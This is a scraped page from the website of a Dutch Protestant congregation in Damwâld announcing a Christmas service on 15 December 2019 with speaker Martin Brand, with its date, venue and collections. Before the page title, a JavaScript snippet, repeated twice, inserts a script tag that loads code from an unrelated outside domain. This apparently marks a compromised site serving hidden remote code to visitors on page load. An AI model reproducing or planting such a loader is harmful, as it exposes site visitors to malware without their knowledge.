;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerst vier je samen met Martin Brand in de Ontmoeting! - PKN Damwâld

Kerst vier je samen met Martin Brand in de Ontmoeting!

Gepubliceerd op: vrijdag 6 december 2019

We hebben inmiddels een al beetje naam gemaakt met de Younited-kerstdiensten. Alweer vier jaar geleden hebben we voor het eerst groots uitgepakt, met toen een hedendaagse weergave van het Kerstverhaal. En weten we allemaal nog van vorig jaar? De prachtige dienst in de sporthal, waarbij we de dienst hebben voorbereid samen met de Gereformeerde kerken van Broeksterwâld en Driezum-Wâlterswâld. Meer dan 1500 mensen bezochten deze dienst!

En nu lopen we alweer tegen het einde van 2019. De kerstversieringen liggen alweer een tijdje in de winkel. Dat betekent voor Younited ook dat er weer wordt nagedacht over een invulling van de kerstdienst. De eerste vergadering was 30 oktober jl. en we hebben al wat ideeën. Hoe en wat precies; dat houden we nog even stil. Wat we wel willen vertellen is dat we een geweldige spreker, muzikant, schrijver en theatermaker hebben uitgenodigd: Martin Brand! Als je hem al eens gezien hebt, dan weet je dat je deze dienst niet wil missen. En als je hem nog niet kent, kom dan vooral ook!

Het thema van de dienst is ‘Kerst vier je samen’. Onthoud dus de datum 15 december en kom samen met Younited een mooie dienst beleven. Want kerst vier je niet alleen, kerst vier je met z’n allen!

Datum: 15 december
Tijd: 19.30 uur
Locatie: De Ontmoeting, Foarwei 48 Damwâld

Collectes:
1e: Victory4All: Organisatie in Zuid-Afrika die vanuit de liefde van Christus hulp geven aan kinderen
2e: Kerk
Uitgang: Younited & Compassion